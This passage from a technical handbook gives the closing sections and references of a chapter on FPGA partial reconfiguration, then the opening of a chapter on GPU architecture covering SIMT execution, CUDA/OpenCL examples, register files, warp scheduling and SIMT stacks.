system, potentially saving costs associated with adding redundancy to every sub-
unit. For instance, consider a system with multiple control units whose functions
can be spawned on-the-fly within an FPGA. Instead of implementing TMR for every
unit, the FPGA can be employed as a fallback that emulates the faulty unit.
Research Directions
Recent focus on open-source tool flows for FPGAs has highlighted the obstacles
presented by proprietary bitstream formats. Efforts to address this are gaining
some attention. Bitstream formats that offer more flexibility, such as relocatability
and runtime modification, could further simplify the design and
management of PR systems.
While the vendor design processes have improved, mapping these to higher-
level system design paradigms useful to embedded and adaptive systems designers
remains a challenge. Most frameworks discussed still require the application user
to know which bitstreams correspond to a particular RM and PRR. An abstracted
model that addresses system designers without hardware experience would increase
the likelihood that they adopt PR in their designs.
The security considerations of partial reconfiguration in the context of multi-
tenancy systems are also under exploration. Considering multiple users sharing a
single FPGA, it is possible for side channels to enable information leakage or other
attacks which must be mitigated (Ahmed et al. 2022).
Conclusions
Partial reconfiguration of FPGAs has been researched for two decades, yet it still
remains a niche feature in practical use. While challenges remain, the
enhanced vendor design flows and the increasing requirement for FPGAs to address
general-purpose compute acceleration in challenging scenarios mean that PR is
gaining increased attention. The development shell concepts now provided by
vendors use PR in the background, demonstrating its robustness and applicability.
Recent developments like the abstract shell design flow make the idea of evolving
functionality of PR systems after initial deployment feasible. Hierarchical PR
also reduces the previous limitations of a single static determination of PRRs on
the device. Using these developments, system designers can now apply PR in
more contexts. The research community is expected to exploit such developments
to further simplify and streamline PR system design leading to potential wider
adoption.
References
Agne A, Happe M, Keller A, Lübbers E, Plattner B, Platzner M, Plessl C (2014) ReconOS: an
operating system approach for reconfigurable computing. IEEE Micro 34(1):60–71
Ahmed MK, Mandebi J, Saha SK, Bobda C (2022) Multi-tenant cloud FPGA: a survey on security.
arXiv preprint arXiv:2209.11158
Agarwal A, Kim D, Seshan S (2023) StaRRNIC: enabling runtime reconfigurable FPGA NICs.
http://reports-archive.adm.cs.cmu.edu/anon/2023/CMU-CS-23-100.pdf
Beckhoff C, Koch D, Torresen J (2012) GoAhead: a partial reconfiguration framework. In:
Proceedings of the IEEE international symposium on field-programmable custom computing
machines (FCCM), pp 37–44
Beckhoff C, Koch D, Torreson J (2013) Automatic floorplanning and interface synthesis of island
style reconfigurable systems with GoAhead. In: International conference on architecture of
computing systems, pp 303–316
Beckhoff C, Koch D, Torresen J (2014) Portable module relocation and bitstream compression
for Xilinx FPGAs. In: 2014 24th international conference on field programmable logic and
applications (FPL), pp 1–8
Benz F, Seffrin A, Huss SA (2012) Bil: a tool-chain for bitstream reverse-engineering. In:
International conference on field programmable logic and applications (FPL), pp 735–738
Bolchini C, Miele A, Santambrogio MD (2007) TMR and partial dynamic reconfiguration to
mitigate SEU faults in FPGAs. In: IEEE international symposium on defect and fault-tolerance
in VLSI Systems (DFT), pp 87–95
Boutros A, Betz V (2023) Field-programmable gate array architecture. In: Chattopadhyay A (ed)
Handbook of computer architecture. Springer, Singapore
Bucknall AR, Shreejith S, Fahmy SA (2019) Network enabled partial reconfiguration for dis-
tributed FPGA edge acceleration. In: 2019 international conference on field-programmable
technology (ICFPT), pp 259–262
Bucknall AR, Fahmy SA (2023) ZyPR: end-to-end build tool and runtime manager for partial
reconfiguration of FPGA SoCs at the edge. ACM Trans Reconfigurable Technol Syst (TRETS)
16(3):34:1–34:33
Bucknall AR (2022) Build framework and runtime abstraction for partial reconfiguration on FPGA
SoCs. Phd thesis, University of Warwick
Capalija D, Abdelrahman TS (2013) A high-performance overlay architecture for pipelined execu-
tion of data flow graphs. In: Proceedings of the international conference on field programmable
logic and applications (FPL)
Caulfield AM, Chung ES, Putnam A, Angepat H, Fowers J, Haselman M, Heil S, Humphrey
M, Kaur P, Kim J-Y et al (2016) A cloud-scale acceleration architecture. In: IEEE/ACM
international symposium on microarchitecture (MICRO)
Compton K, Hauck S (2002) Reconfigurable computing: a survey of systems and software. ACM
Comput Surv 34(2):171–210
Dörr T, Sandmann T, Schade F, Bapp FK, Becker J (2019) Leveraging the partial reconfiguration
capability of FPGAs for processor-based fail-operational systems. In: International symposium
on applied reconfigurable computing, pp 96–111
Duncan A, Rahman F, Lukefahr A, Farahmandi F, Tehranipoor M (2019) FPGA bitstream security:
a day in the life. In: IEEE international test conference (ITC), pp 1–10
Fahmy SA (2018) Design abstraction for autonomous adaptive hardware systems on FPGAs. In:
NASA/ESA conference on adaptive hardware and systems (AHS), pp 142–147
Forencich A, Snoeren AC, Porter G, Papen G (2020) Corundum: an open-source 100-GBPS
NIC. In: IEEE international symposium on field-programmable custom computing machines
(FCCM), pp 38–46
Hussain HM, Benkrid K, Seker H (2015) Dynamic partial reconfiguration implementation of
the SVM/KNN multi-classifier on FPGA for bioinformatics application. In: Proceedings of
the annual international conference of the IEEE engineering in medicine and biology society
(EMBC), pp 7667–7670
Ichinomiya Y, Tanoue S, Amagasaki M, Iida M, Kuga M, Sueyoshi T (2010) Improving the
robustness of a softcore processor against SEUs by using TMR and partial reconfiguration. In:
IEEE international symposium on field-programmable custom computing machines (FCCM),
pp 47–54
Amazon Inc. (2024a) AWS-FPGA. https://github.com/aws/aws-fpga
Xilinx Inc. (2024b) XRT. https://github.com/Xilinx/XRT
Xilinx Inc. (2024) Open-NIC. https://github.com/Xilinx/open-nic
Xilinx Inc. (2024) PYNQ. https://github.com/Xilinx/PYNQ
Irmak H, Ziener D, Alachiotis N (2021) Increasing flexibility of FPGA-based CNN accelerators
with dynamic partial reconfiguration. In: Proceedings of the international conference on field-
programmable logic and applications (FPL), pp 306–311
Iturbe X, Benkrid K, Arslan T, Hong C, Erdogan AT, Martinez I (2011) Enabling FPGAs for
future deep space exploration missions: improving fault-tolerance and computation density with
R3TOS. In: NASA/ESA conference on adaptive hardware and systems (AHS), pp 104–112
Intel (2021) Using the Design Security Features in Intel FPGAs. https://www.intel.com/content/
www/us/en/docs/programmable/683269/current/using-the-design-security-features-in-fpgas.
html
Pham KD, Horta E, Koch D (2017) BITMAN: a tool and API for FPGA bitstream manipulations.
In: Design, automation and test in Europe conference and exhibition (DATE), pp 894–897
Proulx A, Chouinard J-Y, Fortier P, Miled A (2023) A survey on FPGA cybersecurity design
strategies. ACM Trans Reconfigurable Technol Syst 16(2):1–33
Rabozzi M, Durelli GC, Miele A, Lillis J, Santambrogio MD (2016) Floorplanning automation for
partial-reconfigurable FPGAs via feasible placements generation. IEEE Trans Very Large Scale
Integr (VLSI) Syst 25(1):151–164
Reviriego P, Ullah A, Pontarelli S (2019) PR-TCAM: efficient TCAM emulation on Xilinx FPGAs
using partial reconfiguration. IEEE Trans Very Large Scale Integr (VLSI) Syst 27(8):1952–1956
Rodríguez A, Valverde J, Portilla J, Otero A, Riesgo T, Torre E (2018) FPGA-based high-
performance embedded systems for adaptive edge computing in cyber-physical systems: the
ARTICo3 framework. Sensors 18(6):1877
Rossi E, Damschen M, Bauer L, Buttazzo G, Henkel J (2018) Preemption of the partial
reconfiguration process to enable real-time computing with FPGAs. ACM Trans Reconfigurable
Technol Syst (TRETS) 11(2):1–24
Sadek A, Mostafa H, Nassar A, Ismail Y (2017) Towards the implementation of multi-band multi-
standard software-defined radio using dynamic partial reconfiguration. Int J Commun Syst
30(17):3342
Shreejith S, Vipin K, Fahmy SA, Lukasiewycz M (2013) An approach for redundancy in FlexRay
networks using FPGA partial reconfiguration. In: Design, automation and test in Europe
conference and exhibition (DATE), pp 721–724
Soni RK, Steiner N, French M (2013) Open-source bitstream generation. In: IEEE international
symposium on field-programmable custom computing machines (FCCM), pp 105–112
Steiger C, Walder H, Platzner M (2004) Operating systems for reconfigurable embedded platforms:
Online scheduling of real-time tasks. IEEE Trans Comput 53(11):1393–1407
Stitt G, Coole J (2011) Intermediate fabrics: virtual architectures for near-instant FPGA compila-
tion. IEEE Embed Syst Lett 3(3):81–84
Stoddard A, Gruwell A, Zabriskie P, Wirthlin MJ (2016) A hybrid approach to FPGA configuration
scrubbing. IEEE Trans Nucl Sci 64(1):497–503
Vaishnav A, Pham KD, Koch D (2018) A survey on FPGA virtualization. In: International
conference on field programmable logic and applications (FPL), pp 131–138
Vaishnav A, Pham K, Powell J, Koch D (2020) Fos: a modular FPGA operating system for dynamic
workloads. ACM Trans Reconfigurable Technol Syst 20:1–20:28
Vipin K, Fahmy SA (2012) Architecture-aware reconfiguration-centric floorplanning for partial
reconfiguration. In: Reconfigurable computing: architectures, tools and applications: interna-
tional symposium on applied reconfigurable computing, pp 13–25
Vipin K, Fahmy SA (2012) A high speed open source controller for FPGA partial reconfiguration.
In: International conference on field-programmable technology (FPT), pp 61–66
Vipin K, Fahmy SA (2013) Automated partitioning for partial reconfiguration design of adaptive
systems. In: IEEE international symposium on parallel and distributed processing workshops,
pp 172–181
Vipin K, Fahmy SA (2014) Automated partial reconfiguration design for adaptive systems with
CoPR for Zynq. In: Proceedings of the international symposium on field-programmable custom
computing machines (FCCM), pp 202–205
Vipin K, Fahmy SA (2014a) DyRACT: a partial reconfiguration enabled accelerator and test
platform. In: International conference on field programmable logic and applications (FPL)
Vipin K, Fahmy SA (2014b) ZyCAP: efficient partial reconfiguration management on the Xilinx
Zynq. IEEE Embed Syst Lett 6(3):41–44
Vipin K, Fahmy SA (2018) FPGA dynamic and partial reconfiguration: a survey of architectures,
methods, and applications. ACM Comput Surv (CSUR) 51(4), 72:1–72:39
Venieris SI, Bouganis C-S (2017) Latency-driven design for FPGA-based convolutional neural
networks. In: Proceedings of the international conference on field programmable logic and
applications (FPL)
Vliegen J, Mentens N, Verbauwhede I (2013) A single-chip solution for the secure remote config-
uration of FPGAs using bitstream compression. In: International conference on reconfigurable
computing and FPGAs (ReConFig), pp 1–6
Wirthlin M (2015) High-reliability FPGA-based systems: space, high-energy physics, and beyond.
Proc IEEE 103(3):379–389
Xiao Y, Park D, Butt A, Giesen H, Han Z, Ding R, Magnezi N, Rubin R, DeHon A (2019) Reducing
FPGA compile time with separate compilation for FPGA building blocks. In: 2019 international
conference on field-programmable technology (ICFPT), pp 153–161. https://doi.org/10.1109/
ICFPT47387.2019.00026
Xiao Y, Hota A, Park D, DeHon A (2022) HiPR: high-level partial reconfiguration for fast
incremental FPGA compilation. In: 2022 32nd international conference on field-programmable
logic and applications (FPL), pp 70–78
Xilinx (2023) UltraScale Architecture Configuration User Guide. https://docs.amd.com/v/u/en-
US/ug570-ultrascale-configuration
Xilinx (2023) Abstract Shell for Dynamic Function eXchange. https://docs.xilinx.com/r/en-US/
ug909-vivado-partial-reconfiguration/Abstract-Shell-for-Dynamic-Function-eXchange
Xilinx (2024) Using Encryption and Authentication to Secure an UltraScale/UltraScale+ FPGA
Bitstream Application Note (XAPP1267). https://docs.xilinx.com/r/en-US/xapp1267-encryp-
efuse-program/Using-Encryption-and-Authentication-to-Secure-an-UltraScale/UltraScale-
FPGA-Bitstream-Application-Note
GPU Architecture
16
Hyeran Jeon
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
Graphics Pipeline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 533
GPU for General-Purpose Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 536
Execution Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 536
Programming Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
Hardware Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540
Memories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545
Recent Research on GPU Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 550
Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 550
Energy Efficiency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 552
Reliability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 555
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
H. Jeon
University of California Merced, Merced, CA, USA
e-mail: [email protected]
Introduction
Graphics processing units (GPUs) are among the most widely used accelerators
today. As of 2021, 7 of the top 10 world-class supercomputers are powered by
GPUs (Top500 2021). After gaining popularity in the high-performance computing
domain since the mid-2000s, the GPU has been conquering emerging domains such as
deep learning, security, and virtual reality by providing better performance
than other general-purpose computing platforms, easier programmability than
specialized accelerators, and greater affordability than server systems. It is now
impossible to understand the performance of most computing
systems, from servers to mobile devices, without knowledge of GPUs. This
chapter aims to provide a thorough description of the full stack of GPU computing,
from the execution model and programming interfaces to hardware architecture details,
including the organization of compute cores and memory subsystems. Readers
will be able to grasp the unique characteristics of GPU computing and its architecture.
The limited space is not sufficient to cover all the latest designs of this
quickly evolving architecture; thus, this chapter focuses on the
fundamental architecture components and the design details that have been maintained
across all generations of GPU architectures, such as SIMT execution, batched
processing (in warps or wavefronts), the diverse memory types and their characteristics,
etc. A few recent studies that motivated architectural advances are also introduced.
The authors hope that this chapter can be used for developing a basic understanding
and finding ways to navigate the advanced features of GPUs.
The chapter is structured as follows. In section “Graphics Pipeline,” the graphics
pipeline is overviewed by exploring the core functions of graphics processing and
the architecture of the traditional GPU that only supports graphics applications.
This section provides the historical background of the baseline architecture of today's
GPUs. Readers can understand the limitations of traditional GPUs and how the
efforts to mitigate them led to a brand-new architecture that made GPUs one of
the most important high-performance computing engines.
In section “GPU for General-Purpose Computing,” the full stack of general-purpose
GPU (GPGPU) computing is introduced, from the execution model and programming
interfaces to the hardware architecture and memory subsystems.
Graphics Pipeline
(Figure: graphics pipeline stages of vertex, geometry, and pixel processing, followed by render output to the framebuffer)
Fig. 2 Simplified architecture of a traditional GPU, with dedicated vertex (V), geometry (G), and pixel (P) cores attached to memory
painted with complicated color variants. Though the required steps of processing
of these two images are identical, it is obvious that each of them needs different
functional intensities. The left-hand side image needs more operations of geometry
functions while the right-hand side image has higher demand on pixel functions. If
these two images are processed on the same GPU with a fixed number of geometry
and pixel cores, the type of core for which the input image has higher intensity will
become the performance bottleneck. As the number of cores per function is not
dynamically reconfigurable, the throughput of these traditional GPUs was highly
dependent on the type of input images.
To resolve the aforementioned performance issue, one solution was to combine
the dedicated functional cores into a uniform core, namely the unified shader core.
The unified shader core can handle basic arithmetic and logic operations similar to
arithmetic logic units (ALU). Therefore, the graphics operations can be executed
by using combinations of instructions. This effectively resolves the performance
issue caused by limited core resources because each graphics function can use all
cores for its computation. The unified shader core also shed light on using GPUs for
general-purpose computing, which is called GPGPU. As unified shader cores can
not only run graphics operations but also handle any arithmetic operations, they can
also be used for running general-purpose applications such as sorting, matrix/vector
operations, etc. As GPUs inherently have massive parallel processing power, with
tens of compute cores to handle abundant pixel processing, a new computing
wave arose to leverage GPUs with unified shader cores as a new high-performance
computing platform fulfilling the performance needs of big data workloads
that were challenging to support with a handful of CPU cores. With the release
of software frameworks that provide C-like programmability for GPUs, GPGPU
became one of the most promising high-performance computing platforms from the
mid-2000s. The GPGPU programming model and architectures will be explored
in the following section. As virtually all modern GPUs have general-
purpose computing capabilities, GPGPU and GPU will be used interchangeably in
the following sections.
Execution Model
With unified shader cores, GPUs were adopted for non-graphics domains, especially
high-performance computing. GPUs have demonstrated superior performance
for data-intensive workloads that need massive data-level parallelism. Unlike CPUs,
which are designed for handling complex control flows with high instruction-level
parallelism, GPUs are mainly used for applications that process abundant
data. Like graphics applications, these so-called big data workloads require large
volumes of independent data (pixels in graphics) to be processed with the same
algorithms (the core functions of the graphics pipeline). For example, deep learning
is proven to be well suited to
GPU computing. In deep learning, tens to hundreds of data in each layer of a neural
network are processed with neurons that run the same algorithm (e.g., convolution
function). Data within a neural network layer are independent and hence neurons do
not need to consider inter-neuron data dependency. As long as dependencies across
layers are enforced, all data in each layer can be computed with identical func-
tions independently. The GPU's execution model is similar to single-instruction
multiple-data (SIMD) in Flynn's taxonomy because multiple independent data are
processed with the same algorithm. Unlike vector processors that implement SIMD
with a single instruction fetch for a vector of data, GPUs use multiple threads, each
of which fetches the same instruction to process one datum. Therefore, GPU computing
is more precisely defined as single-instruction multiple-threads (SIMT).
Even with unified shader cores and SIMT processing, there was another performance
bottleneck: data access latency. Figure 4a shows a simplified SIMT
execution where a group of SIMT lanes (white lines in the computation box)
encounter a memory stall and resume the execution once the data arrive from the
memory. As all threads execute the same instruction each cycle, all threads within
the SIMT unit encounter memory stalls at the same time. Then, the threads stop
execution until when the data become ready. During that time, all shader cores
become idle. Because memory access latency is typically hundreds of cycles, the
performance overhead is significant. Therefore, another evolution was needed in
the thread scheduling. Figure 4b shows the group-level thread scheduling, where a
GPU runs a program with groups of threads and schedules each group in a certain
order. The example figure shows a round-robin scheduling where thread groups 1 to
3 take turns to run computations with time multiplexing. The thread group context
switching happens when each group encounters memory stalls. While one thread
group (e.g., group 1 in the figure) is waiting for their data, another ready group
(e.g., group 2) runs non-memory operations. If a sufficient number of thread groups
is supported, the memory stall overhead can be completely hidden. These thread
groups are called warps in NVIDIA GPUs and wavefronts in AMD GPUs. Warp
scheduling is handled by hardware schedulers called warp schedulers or
wavefront schedulers. The details of warp scheduling will be discussed in section
“Hardware Architecture.”
Fig. 4 GPU execution (a) without thread groups and (b) with batched processing in thread
groups
Programming Interface
OpenCL:

__kernel void vadd (__global const float *a,
                    __global const float *b,
                    __global float *result)
{
    int id = get_global_id(0);
    result[id] = a[id] + b[id];
}

CUDA:

__global__ void vadd (float *a, float *b, float *result)
{
    int id = blockIdx.x * blockDim.x + threadIdx.x;
    result[id] = a[id] + b[id];
}
dimension, respectively. On the other hand, OpenCL provides a function that returns
the global ID, get_global_id(). The kernel function is defined with __global__ in
CUDA and HIP, and with __kernel in OpenCL. Input and output parameters in CUDA
are allocated in global memory (the main memory attached to the GPU
card) by default, and hence there is no need to specify the memory name in CUDA.
In OpenCL code, however, the function parameters need the __global qualifier to
indicate that they are allocated in global memory. Other than
that, the code for the vector addition is identical. Once a thread acquires its global
ID, the thread retrieves one element from each of the two input vectors with the
ID and adds them into an entry in the output vector. As all threads involved in this
GPU program run the same kernel code, N-element vector additions can be done in
parallel with N threads with only two code lines without any loop iterations.
GPUs can be integrated into a system either through the PCIe bus or on the same
processor package as the host CPU. If GPUs are connected through the PCIe bus,
GPUs typically have their dedicated memory. Therefore, input and output data need
to be explicitly sent from/to the CPU system memory. Also, the memory space for
these data is required to be allocated via GPU APIs. Code 2 shows the program that
is executed on the host CPU to run the vector addition function. In this example
code, 32-element arrays A and B are passed to the GPU kernel and added to an
output 32-element array C. The input arrays A and B are allocated in the GPU
memory with cudaMalloc and the array values are sent to the GPU via cudaMemcpy.
The kernel is invoked with a thread block of 32 threads, as defined in variables
numBlocks and numThreads. These thread and block information are passed to the
kernel between <<< and >>> marks. The pointers for the input and output data
are passed as regular CPU functions. Once the kernel is finished, the output data
needs to be copied back to the CPU system memory as can be seen in the last
line of the code. HIP-equivalent program can be written by replacing cudaMalloc
int main()
{ // executed on CPU
  float A[32] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, … 31};
  float B[32] = {9, 8, 7, 6, 5, 4, 3, 2, 1, 0, … 2};
  float C[32] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, … 0};
  float *g_A, *g_B, *g_C;
  cudaMalloc((void**)&g_A, 32 * sizeof(float));
  cudaMalloc((void**)&g_B, 32 * sizeof(float));
  cudaMalloc((void**)&g_C, 32 * sizeof(float));
  cudaMemcpy(g_A, A, 32 * sizeof(float), cudaMemcpyHostToDevice);
  cudaMemcpy(g_B, B, 32 * sizeof(float), cudaMemcpyHostToDevice);
  int numBlocks = 1;
  int numThreads = 32;
  vadd <<<numBlocks,numThreads>>>(g_A, g_B, g_C);
  cudaMemcpy(C, g_C, 32 * sizeof(float), cudaMemcpyDeviceToHost);
}
with hipMalloc, cudaMemcpy with hipMemcpy, and the kernel invocation line
with hipLaunchKernel. As the focus of this chapter is not GPGPU programming,
descriptions for more APIs and compiler intrinsics are omitted. The readers can find
the up-to-date programming interfaces from CUDA programming guide (NVIDIA
2022) and HIP programming guide (AMD 2021).
Hardware Architecture
Shader Pipeline
Figure 7 illustrates the graphical view of GPU architecture with device memories
and the shader pipeline. Each SM consists of compute cores and memory that are
required for SIMT execution. Instructions are executed in warp unit where each
SIMT lane (thread) is executed on one of the shader cores (or SIMT execution units).
A simple in-order pipeline is used that consists of fetch, decode, issue, execute,
and writeback steps, as highlighted with green color. After the decode stage, the
decoded instructions are enqueued in an instruction buffer. The instructions are
marked as ready by scoreboard logic once data hazards (e.g., read-after-write and
write-after-write dependencies) are cleared.
Register File
A CPU normally has a small register file to maintain one or a handful of process
contexts. Thus, the register file size is typically up to several hundred bytes. Once
a process is scheduled out, context switching happens by copying the current
process's register values from the register file to stack memory and moving the new
process's register values from the stack to the register file. This memory copy-based
context switching is used in CPUs because the size of the data copy is only several
hundred bytes, which induces acceptable performance overhead. However, such
a memory copy-based context switch is not practical in GPUs because GPUs
run instructions at warp granularity, where a warp consists of 32 threads. To make
things worse, a warp-level context switch happens every cycle to hide memory access
latency (details will be discussed in section “Warp Scheduler”). This means that
32 threads' worth of registers would have to be copied every cycle, which would cause too
much performance overhead. Instead, GPUs employ a large register file that can
hold registers of tens of warps. With the large register file, warps can retrieve their
registers without any memory copy. In a P100 architecture shown in Fig. 6, each
SM has two 128 KB register files. The aggregated register file size in a P100 that
has 56 SMs is 14 MB. The register file space is flexibly utilized by active warps.
For example, a P100 architecture allows up to 255 registers per thread. As each
register file in an SM contains 32,768 32-bit registers (as noted in Fig. 6), up
to four warps can be supported when threads use all 255 registers (32,768 ≈ 32
threads/warp × 255 registers/thread × 4 warps). Or, if threads use only 32 registers
for a given kernel, up to 32 active warps can be supported.
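As a quick check of the arithmetic above, the warp limit per register file can be written
out directly (a hypothetical helper for illustration; numbers are from the P100 description
in the text):

/* 32,768 32-bit registers per register file; 32 threads per warp. */
int max_active_warps(int regs_per_thread)
{
    return 32768 / (32 * regs_per_thread);  /* 255 regs -> 4 warps, 32 regs -> 32 warps */
}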
To feed all threads in a warp in each cycle, GPUs employ a banked register file.
Figure 8 illustrates the banked register file. Each bank can feed multiple threads per
warp. For example, if a bank has 128-byte width, each entry of a bank can hold four
32-bit registers such as r1 for thread 0 to thread 3 of the same warp. In other words,
a warp accesses eight banks to retrieve r1 for all 32 threads in a cycle. Though each
register can be read in one cycle, each instruction typically consumes multiple cycles
to read all of its operands. Until all operand values of an
instruction are collected, the retrieved registers are buffered in the operand collector
unit. Each warp has up to three slots in the operand collector unit because GPU
instructions can use up to three operands. Each slot consists of 32 32-bit entries to
hold registers of all 32 threads in a warp. Once all operand values are retrieved, the
instruction is issued to the corresponding execution units.
Fig. 8 A banked register file: banks 0 to N−1 feed the operand collector through a crossbar
Warp Scheduler
In a GPU, instructions are executed at warp granularity. The threads in a warp execute
the same instruction every cycle in a lock-step manner by sharing PC values.
This warp-level execution enables batched processing of data intensive workloads.
However, as GPU uses in-order execution, once a warp encounters stalls due to data
hazards or structural hazards (e.g., bank conflicts in register file or shared memory
accesses), the warp must stop execution until the hazard is resolved. Therefore,
the GPU schedules a different warp every cycle. It is known that data hazard stalls can be
hidden with at least six warps. To select a different ready warp each cycle, GPUs are
equipped with warp schedulers. The warp scheduler checks the availability of each
warp and selects one ready warp to issue an instruction. Round-robin is the baseline
scheduling algorithm that chooses warps based on the warp ID in either increasing
or decreasing order. Round-robin is a simple and fair scheduling algorithm, but it is
not effective at hiding memory stall latency. As threads within a warp execute the same
instruction, once a memory load operation is executed, data for all 32 threads must
be loaded from memory together, which takes several hundred cycles. To make
things worse, as warps run the same kernel code while being interleaved by
round-robin scheduling, neighboring warps are likely to execute the same
instruction. Therefore, once a warp encounters a memory stall, the following
warps are likely to encounter the same memory stall. This leaves most of the warps
stuck at memory stalls and the compute cores idle for a long time.
To resolve the limitations of the round-robin scheduler, several warp schedulers have
been proposed. One representative scheduler is the two-level scheduler proposed
by NVIDIA researchers (Gebhart et al. 2011). The two-level scheduler uses two
warp queues, one is for ready warps and another for pending warps. Only a small
number of ready warps are enqueued in the ready queue and the remaining ready
warps and the warps stuck at memory stalls are enqueued to the pending queue. Each
cycle, the warp scheduler chooses one in the ready queue in round-robin fashion.
Once a warp in the ready queue encounters a memory stall, the warp is moved to the
pending queue and one ready warp in the pending queue is enqueued to the ready
queue. By running a small group of warps ahead of the others, the two-level
scheduler staggers the progress of warps so that they do not all reach long-latency
memory operations at the same time, improving latency hiding.
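The queue movement described above can be sketched in C as follows; this is an
illustrative software model only, with the queue sizes, the stalled flag, and the
schedule() interface chosen for exposition rather than taken from any vendor hardware.

#include <stdbool.h>
#include <stddef.h>

#define READY_SLOTS 8
#define MAX_WARPS 64

typedef struct { int id; bool stalled; } Warp;

static Warp *ready[READY_SLOTS]; static int n_ready;
static Warp *pending[MAX_WARPS]; static int n_pending;
static int rr; /* round-robin cursor over the ready set */

/* One decision per cycle: issue from a ready warp, or demote a stalled
 * warp to the pending queue and promote a runnable one in its place. */
Warp *schedule(void)
{
    if (n_ready == 0) return NULL;
    rr = (rr + 1) % n_ready;
    Warp *w = ready[rr];
    if (!w->stalled)
        return w;                       /* issue this warp's instruction */
    pending[n_pending++] = w;           /* demote the stalled warp */
    ready[rr] = ready[--n_ready];       /* compact the ready set */
    for (int i = 0; i < n_pending; i++) /* promote one runnable warp */
        if (!pending[i]->stalled) {
            ready[n_ready++] = pending[i];
            pending[i] = pending[--n_pending];
            break;
        }
    return NULL;                        /* no issue this cycle */
}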
SIMT Stack
Threads in a warp execute the same instruction every cycle, by sharing a program
counter (PC) value. For non-branch operations, this warp-level execution is easy to
handle. Every cycle, the warp's PC value is incremented and execution proceeds to the next
line of code. But for control branches, threads in a warp may need to execute
different diverged flows. For example, for an if-else statement in Fig. 9, the even
numbered threads should execute the if clause while the odd numbered threads must
execute the else clause.
In this case, GPUs cannot execute both the if and else clauses
in parallel because threads in a warp share the same PC value. Instead, each warp
traverses both clauses sequentially. To allow threads to execute the correct diverged
flow only (either if or else clause in this example), GPU uses active mask. An active
mask is a 32-bit vector that indicates the activeness of individual threads in a warp.
If a thread has a value “1” in its entry in the active mask, the thread can execute an
instruction. Otherwise, the thread skips execution in that cycle. In Fig. 9, the right-
hand-side flow graph shows the active mask of each path. The if statement (①) is
executed by all 32 threads, so the active mask has all 1’s. The if clause (②) is entered
by even numbered threads so the active mask has 1’s for every other bit from the
first bit (bits 0, 2, 4, …). Likewise, the else clause (③) has 1’s for every other bit from
the second bit (bits 1, 3, 5, . . . ). At the end of the if-else statement (④), the threads
converge again so the active mask is fully filled with 32 1’s.
The active mask value is updated every cycle to enforce correct execution.
To enable threads in a warp to execute all diverged flows and converge at their
immediate post-dominator reconvergence point, GPU employs a SIMT stack.
① if (threadIdx.x % 2 == 0) {            // active mask: 1111…1
②     // executed by even numbered
      // threads (thread 0, 2, 4, …, 30)  // active mask: 1010…0
  } else {
③     // executed by odd numbered
      // threads (thread 1, 3, 5, …, 31)  // active mask: 0101…1
  }
④ ... // reconvergence point              // active mask: 1111…1

Fig. 9 A diverged flow example (left) and active masks per path (right)
Fig. 10 SIMT stack value transition for the diverged flow example in Fig. 9
A SIMT stack keeps track of the next PC value with the corresponding active mask,
as shown in Fig. 10. Once a warp encounters a control branch, the stack grows
by as many entries as the number of diverged flows. Each entry has the PC value
associated to the diverged flow and the PC value of the reconvergence point. The
reconvergence point is the address of the instruction that is the immediate post-
dominator (PDOM) of the diverged flows. For example, line ④ is the PDOM of
the paths ② and ③ in Fig. 9. If each diverged flow has nested diverged flows, the
stack grows further so that all paths can be explored properly. Figure 10 shows the
SIMT stack operations while traversing diverged flows ② and ③ sequentially. Once
① finds two diverged flows, the stack grows to hold the two paths, as shown with ②.
The top of stack (TOS) points to the instructions of path ②. The entries for the other
flow ③ and the convergence point ④ are also stacked, to be executed in the following
cycles. After finishing the execution of path ②, the stack is shortened, and the TOS
points to the path of ③. Finally, when path ③ finishes and the next PC reaches that
of ④, the stack is reduced to one entry, which means that there is no more divergence.
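The bookkeeping above can be sketched as a small C model of a PDOM-based SIMT
stack; the entry layout and function names here are illustrative assumptions, not taken
from any particular GPU implementation.

#include <stdint.h>

typedef struct {
    uint32_t pc;   /* next PC for this path */
    uint32_t rpc;  /* reconvergence (PDOM) PC */
    uint32_t mask; /* 32-bit active mask for the path */
} SimtEntry;

static SimtEntry stack[32];
static int tos; /* stack[tos] supplies the warp's PC and active mask */

/* On a divergent branch: the current entry now waits at the reconvergence
 * point, and one entry per diverged path is pushed above it. */
void diverge(uint32_t taken_pc, uint32_t taken_mask,
             uint32_t fall_pc, uint32_t fall_mask, uint32_t rpc)
{
    stack[tos].pc = rpc;                                   /* e.g., point ④ */
    stack[++tos] = (SimtEntry){fall_pc, rpc, fall_mask};   /* e.g., path ③ */
    stack[++tos] = (SimtEntry){taken_pc, rpc, taken_mask}; /* e.g., path ② */
}

/* Called after stack[tos].pc is updated each cycle: pop once the active
 * path reaches its reconvergence point, unwinding as in Fig. 10. */
void reconverge(void)
{
    if (tos > 0 && stack[tos].pc == stack[tos].rpc)
        --tos;
}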
Memories
Unlike a CPU, which typically uses a large system memory and multilevel caches, a
